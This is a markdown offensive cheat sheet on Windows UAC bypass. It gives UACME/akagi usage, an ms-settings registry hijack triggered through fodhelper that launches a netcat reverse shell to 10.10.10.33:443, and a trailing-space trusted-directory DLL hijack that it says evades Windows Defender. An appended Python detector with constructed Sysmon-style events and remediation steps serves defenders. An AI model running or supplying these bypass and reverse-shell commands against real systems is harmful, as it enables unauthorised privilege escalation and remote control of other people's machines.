# UAC Bypass

## UACME

Akagi (UACME) will be a win here 99% of the time.

* <https://github.com/hfiref0x/UACME>

```
akagi64 61 c:\windows\system32\cmd.exe
```

## Technique 1

* <https://twitter.com/xxByte/status/1381978562643824644>

```
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'c:\users\morph3\nc.exe -e cmd.exe 10.10.10.33 443' -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
```

Now simply run `fodhelper` and you should have the shell.

To undo this,

```
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
```

## Technique 2

This technique is pretty solid and is not detected by Windows Defender.

* <https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/>
* <https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e>

TL;DR: you can fool Windows by creating a folder called `c:\windows \System32\` (note the trailing space after `windows`), copying an auto-elevating Windows binary into it, and hijacking one of the DLLs it loads. There is a full list of hijackable binaries here:

* <https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows>

```
mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
copy ".\morph.dll" "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"
```

* You might need to compile your DLL for the 64-bit architecture.

```
# x64
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp

# x86
i686-w64-mingw32-gcc -shared -o test-x86.dll test.cpp
```
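As an added example that is not part of the original page, here is a small detector for both techniques above, written from the defender's side and run over Sysmon-shaped events (EventID 1 = process create, 11 = file create, 13 = registry value set). The sample records are constructed for this example, not real telemetry, and the detection names are my own.

```python
"""Flag telemetry for the two UAC-bypass techniques described on this page."""
import re

# Technique 1: ms-settings is normally registered under HKLM/HKCR, so a
# shell\open\command key for it inside a *user* hive is a handler hijack no
# matter what value is written. Sysmon may log the per-user Classes hive as
# HKU\<SID>\Software\Classes\... or as HKU\<SID>_Classes\..., so match both.
MS_SETTINGS_KEY = re.compile(
    r"^HKU\\[^\\]+(\\Software\\Classes|_Classes)"
    r"\\ms-settings\\shell\\open\\command(\\|$)",
    re.IGNORECASE,
)
# Technique 2: a directory name that ends in a space ("C:\Windows \") is not
# created by normal tooling, so any such path component is a hit.
TRAILING_SPACE_DIR = re.compile(r" (\\|$)")

# Constructed sample events (field names follow Sysmon's schema).
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Classes\ms-settings\shell\open\command\DelegateExecute", "Details": "(Empty)"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Classes\ms-settings\shell\open\command\(Default)", "Details": r"c:\users\x\nc.exe -e cmd.exe 10.0.0.1 443"},
    {"EventID": 11, "TargetFilename": r"C:\Windows \System32\Secur32.dll"},
    {"EventID": 1, "Image": r"C:\Windows \System32\computerdefaults.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "IntegrityLevel": "Medium"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Classes\.txt\(Default)", "Details": "txtfile"},
]


def classify(event):
    """Return the detection names an event triggers (empty list if benign)."""
    hits = []
    eid = event.get("EventID")
    if eid == 13 and MS_SETTINGS_KEY.search(event.get("TargetObject", "")):
        hits.append("uac_bypass.ms_settings_handler")
    path = event.get("TargetFilename") if eid == 11 else event.get("Image") if eid == 1 else None
    if path and TRAILING_SPACE_DIR.search(path):
        hits.append("uac_bypass.trailing_space_dir")
    # A high-integrity process started from the spoofed directory is the
    # strongest signal: the trusted-directory check has already been fooled.
    if eid == 1 and event.get("IntegrityLevel") == "High" and "uac_bypass.trailing_space_dir" in hits:
        hits.append("uac_bypass.elevated_from_spoofed_dir")
    return hits


def scan(events):
    """Map event index -> detections, keeping only the events that fired."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].get("EventID"), ", ".join(names))
```

Remediation for hits is the cleanup already shown above for Technique 1 (remove the `HKCU:\Software\Classes\ms-settings` key) and deleting the trailing-space directory for Technique 2; raising UAC to "Always notify" removes the silent auto-elevation both techniques rely on.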
